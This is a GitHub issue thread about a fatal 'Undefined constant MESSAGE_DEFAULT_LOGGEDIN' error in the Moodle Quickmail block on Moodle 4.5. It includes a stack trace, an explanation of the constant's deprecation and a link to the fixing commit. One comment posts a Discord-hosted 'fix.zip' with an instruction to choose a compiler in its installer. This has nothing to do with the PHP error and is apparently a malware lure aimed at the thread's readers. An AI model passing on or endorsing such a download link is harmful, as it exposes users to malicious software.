### ISSUE TITLE
4.5 Fatal error 

### ISSUE THREAD

**Issue by aspark21** [lsuonline/lsuce-block_quickmail#90]
https://tracker.moodle.org/browse/MDL-73284

```
    -->block_quickmail
    !!! Exception - Undefined constant "MESSAGE_DEFAULT_LOGGEDIN" !!!
    !!
    Error code: generalexceptionmessage !!
    !! Stack trace: * line 30 of /blocks/quickmail/db/messages.php: Error thrown
    * line 692 of /lib/messagelib.php: call to require()
    * line 419 of /lib/messagelib.php: call to message_get_providers_from_file()
    * line 617 of /lib/upgradelib.php: call to message_update_providers()
    * line 1071 of /lib/upgradelib.php: call to upgrade_component_updated()
    * line 647 of /lib/upgradelib.php: call to upgrade_plugins_blocks()
    * line 1931 of /lib/upgradelib.php: call to upgrade_plugins()
    * line 494 of /lib/installlib.php: call to upgrade_noncore()
    * line 492 of /lib/phpunit/classes/util.php: call to install_cli_database()
    * line 152 of /admin/tool/phpunit/cli/util.php: call to phpunit_util::install_site()
     !!

```

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by lkcivan** [comment]
* Loggedin / Loggedoff component settings on notification preferences have been merged to a single enabled switch:
  MESSAGE_DEFAULT_LOGGEDIN and MESSAGE_DEFAULT_LOGGEDOFF are now deprecated, so plugins should be updated if db/messages.php is present and replace
    MESSAGE_DEFAULT_LOGGEDIN + MESSAGE_DEFAULT_LOGGEDOFF to MESSAGE_DEFAULT_ENABLED. Backward compatibility will take any of both settings as enabled.
  MESSAGE_DEFAULT_PERMITTED also deprecated.
  core_message_get_user_notification_preferences and core_message_get_user_message_preferences Webservice are now returning enabled boolean on
    components > notifications > processors. loggedin and loggedoff are deprecated but present for backward compatibility.

**Comment by aspark21** [comment]
Fixed in https://github.com/lsuonline/lsuce-block_quickmail/commit/0c9c9da980ad403bb16cdbe0ec68e2c3578e4cca
